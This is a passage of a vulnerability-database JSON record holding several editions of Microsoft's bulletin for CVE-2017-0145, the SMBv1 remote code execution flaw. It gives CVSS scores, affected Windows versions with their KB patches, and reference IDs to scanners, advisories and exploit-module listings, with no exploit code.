x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-03-18T19:17:49", "differentElements": ["cvss2", "cvss3"], "edition": 3}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-07-28T20:07:07", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-07-28T20:07:07", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-07-28T20:07:07", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB3212646", "KB4012213", "KB4013429", "KB4012216", "KB3210721", "KB3177186", "KB4012606", "KB4012217", "KBMS16-110, 3187754", "KB4013198", "KB4012598", "KB4014077", "KB3210720", "KB4012215", "KB4012212", "KB4012214", "KB3205401", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-07-28T20:07:07", "differentElements": ["msAffectedSoftware"], "edition": 4}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-03T18:46:41", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-03T18:46:41", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-03T18:46:41", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB3210721", "KB4012212", "KB3177186", "KB4012213", "KB4012217", "KBMS16-110, 3187754", "KB4012215", "KB3205409", "KB4012606", "KB3210720", "KB4012598", "KB4012216", "KB4013429", "KB4012214", "KB4014077", "KB3213986", "KB4013198", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-03T18:46:41", "differentElements": ["msAffectedSoftware"], "edition": 5}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-03T20:42:24", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": 